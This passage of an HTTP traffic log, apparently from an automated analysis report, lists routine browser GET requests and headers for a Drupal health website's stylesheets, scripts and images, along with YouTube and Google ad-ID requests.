  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: YSC=VZrzuY-qz_o
  cookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3D
  cookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0
  cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3D
  priority: i

Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1
  host: googleads.g.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.youtube.com
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1
  host: googleads.g.doubleclick.net
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  origin: https://www.youtube.com
  x-client-data: CLbgygE=
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  referer: https://www.youtube.com/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/clearfix.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/reset-appearance.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-general-info.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/fieldgroup.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-counters.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/resize.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /core/modules/layout_discovery/layouts/onecol/onecol.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/style.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1
  host: googleads.g.doubleclick.net
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1
  host: googleads.g.doubleclick.net
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1
  host: yt3.ggpht.com
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1
  host: googleads.g.doubleclick.net
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  x-client-data: CLbgygE=
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=1, i

Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/css/views_slideshow_cycle.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/misc/drupalSettingsLoader.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/nowrap.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/tree-child.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-counter.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/misc/drupal.init.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/tablesort.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/questionnaire.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/banner-slider.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/once/once.min.js?v=1.0.1 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/jquery-patch-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/scroll-parent-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
